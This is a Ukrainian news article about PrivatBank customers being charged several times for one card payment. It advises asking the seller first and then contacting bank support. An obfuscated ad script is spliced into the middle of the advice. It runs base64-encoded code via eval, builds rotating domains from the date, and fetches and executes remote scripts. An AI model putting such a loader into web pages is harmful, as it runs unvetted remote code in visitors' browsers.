Клієнти Приватбанку повідомляють про збої: гроші знімають кілька разів при оплаті картками

Клієнти Приватбанку розповідають, що через збої в системі при оплаті карткою в магазинах часто трапляються неприємні ситуації — однакова сума списується кілька разів. Як діяти в цьому випадку — пояснюють журналісти Акцента.

Наприклад, дві транзакції на зняття коштів. Одна транзакція — повернення: Дві транзакції на зняття коштів в один і той же час:

У точці продажу оператору може показувати помилку під час першої операції. Тоді він друкує чек відмови, який ви можете отримати відразу. Далі він робить іншу транзакцію. В результаті — у людини 2 рази списують кошти з картки.

Іноді продавцю відмовляють через технічні роботи, проблеми зі зв’язком, неправильно введений пін-код.

Що робити клієнту Приватбанка?

Спочатку ви маєте уточнити у продавця, чому не вдалося сплатити товар, або чому у вас зняли кошти 2 рази. Якщо на місці працює технічний менеджер, він фіксує всі грошові операції. Зазвичай він може надати клієнту всю інформацію по грошовим транзакціям, які здійснювалися в магазині. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Якщо проблема не вирішилася, гроші вам не повернули, необхідно звернутися до служби підтримку Приватбанку. Зробити це можна через вбудований онлайн чат або за телефоном 3700.

Будьте уважні, оскільки через технічні роботи, проблеми зі зв’язком, системи можуть працювати з певними перебоями. Фіксуйте свій баланс та суми зняття при оплаті карткою.

Тематичне фото — Трибуна Бровари. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/kliyenti-privatbanku-povidomlyayut-pro-zboyi-groshi-znimayut-kilka-raziv-pri-oplati-kartkami/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top